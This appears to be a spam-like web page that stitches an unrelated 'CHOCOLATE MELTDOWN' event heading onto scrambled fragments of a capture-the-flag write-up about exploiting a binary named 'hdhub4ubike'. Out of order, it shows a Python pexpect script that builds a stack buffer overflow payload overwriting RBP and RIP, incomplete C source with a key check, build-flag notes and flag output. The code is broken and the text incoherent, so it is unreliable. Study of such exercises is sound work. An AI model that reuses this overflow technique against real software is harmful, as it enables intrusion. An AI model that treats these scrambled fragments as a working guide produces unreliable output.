CHOCOLATE MELTDOWN, Saturday, Jan 10, 1 - 5PM
CHOCOLATE MELTDOWN, Saturday, Jan 10, 1 - 5PM

Hdhub4ubike Best -

$ ./exploit.py === Welcome to the HD Bike Hub === Enter your hub key: flagh0p3_y0u_f0und_th3_h1d3_b1k3 flagh0p3_y0u_f0und_th3_h1d3_b1k3 Congratulations – you’ve successfully bypassed the hub‑key check and recovered the flag from hdhub4ubike ! 🎉

def main(): p = pexpect.spawn(BIN, encoding='utf-8') p.expect("Enter your hub key:") # build payload payload = b'A' * 64 # fill buffer payload += b'B' * 8 # overwrite saved RBP payload += struct.pack("<Q", TARGET_ADDR) # overwrite RIP hdhub4ubike

int main(void) char buf[64]; puts("=== Welcome to the HD Bike Hub ==="); printf("Enter your hub key: "); printf("Enter your hub key: ")

/* ---------------------------------------------------- */ int check_key(const char *key) // key must be exactly 0x30 bytes long if (strlen(key) != 0x30) return 0; secret_key) != 0) return 0

$ ./hdhub4ubike === Welcome to the HD Bike Hub === Enter your hub key: Static analysis quickly reveals that the binary is stripped (no symbols) and that it is compiled with , -z execstack , and -no-pie – classic “easy pwn” settings.

if __name__ == "__main__": main() Running the script prints the flag instantly:

// compare with a secret stored in the .rodata section if (strcmp(key, secret_key) != 0) return 0;